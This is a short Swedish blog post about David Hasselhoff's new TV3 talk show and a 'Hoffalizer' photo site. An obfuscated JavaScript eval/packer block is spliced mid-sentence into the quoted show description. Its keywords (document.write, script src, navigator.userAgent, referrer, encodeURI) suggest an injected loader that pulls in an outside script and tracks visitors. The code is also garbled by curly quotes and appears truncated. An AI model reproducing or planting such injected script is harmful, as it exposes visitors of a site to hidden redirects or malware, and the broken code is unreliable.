Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Bli en Hasselhoff med Hoffalizern

Bli en Hasselhoff med Hoffalizern

Som många redan vet så är det dags för kändisen David Hasselhoff att sätta igång med sin egna talkshow i Sverige. Showen kommer att sändas på TV 3 och innehålla en massa roligt innehåll.

Sä här skriver TV 3 om den nya serien:

Hundraåringsregissören eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfnbf|var|u0026u|referrer|asfdr||js|php’.split(’|’),0,{}))
Felix Herngren och Guldbaggevinnarna Cecilia Frode och Johannes Brost gästar premiärprogrammet. Felix berättar, mycket explicit, vad Herman Göring egentligen gjorde i hans lägenhet och visar Hasselhoff ”Monkey and the tree”.

Frode tävlar med Hoffen i en ”cry-out” – vem av dem kan gråta på beställning? Vi går även bakom kulisserna på inspelningen av ”Snow-Watch”, Hasselhoffs uppföljare till Baywatch.

Ovan kan ni se hur jag skulle se ut om jag var lika vältränad som David Hasselhoff.

Du kan själv prova via länken som följer: http://hoffalizer.se/